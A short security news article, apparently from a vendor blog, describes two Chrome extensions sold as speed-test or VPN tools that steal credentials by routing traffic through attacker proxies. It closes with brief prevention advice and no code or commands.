Discovery of Malicious Chrome Extensions
Two Chrome extensions were recently found stealing user credentials. Cybersecurity researchers uncovered both add-ons during routine analysis. Therefore, the threat raises serious privacy concerns.
Both extensions share the same name and developer. However, each has a different extension ID. As a result, detection became harder.
Disguised as a Legitimate Tool
The extensions claim to offer network speed testing services. They target developers and international trade workers. However, this description hides their true behavior.
Users believe they are buying a VPN-like service. Therefore, many willingly pay subscription fees.
Users pay monthly or yearly fees for premium access. Once payment completes, the extension grants VIP status. However, this action activates malicious features. The VIP mode automatically enables a proxy setting. As a result, traffic flows through attacker-controlled servers.
How Traffic Interception Works
The extensions route traffic from over 170 domains. For example, they target cloud platforms and developer tools. Therefore, high-value credentials are exposed.
They also intercept social media and adult websites. Researchers believe this enables blackmail attempts.
Malicious JavaScript Injection
The extensions modify bundled JavaScript files. Specifically, they alter common libraries used by websites. Therefore, the malicious code runs silently.
The script injects hard-coded proxy credentials. As a result, users never see authentication prompts.
The extensions operate as man-in-the-middle proxies. However, users only see normal browsing behavior. Therefore, suspicion remains low. Attackers gain full visibility into web traffic. This includes login sessions and form submissions.
Every five minutes, the extensions send data externally. For example, they transmit email addresses and passwords. Therefore, attackers receive constant updates.
A heartbeat signal also confirms the extension remains active. As a result, monitoring continues uninterrupted.
High-Risk Data Exposure
Stolen data includes passwords and payment details. Moreover, attackers collect API keys and access tokens. Therefore, developer accounts face severe risks.
Compromised credentials may enable supply chain attacks. This creates broader organizational impact.
Signs of Organized Operations
The infrastructure shows long-term planning. Researchers noted professional payment systems and cloud hosting. Therefore, the operation appears well-funded.
Language indicators and payment methods suggest an Asia-based origin. However, attribution remains unconfirmed.
Browser extensions now pose unmanaged risks. Employees often install tools without review. Therefore, sensitive data leaks occur silently. Security teams must reassess extension controls. Monitoring permissions is critical.
How to Prevent Credential Theft
Organizations should enforce browser extension allowlists. Continuous monitoring can detect suspicious proxy behavior early. Moreover, endpoint protection with threat intelligence helps block malicious add-ons before damage occurs.
Sleep well, we got you covered.
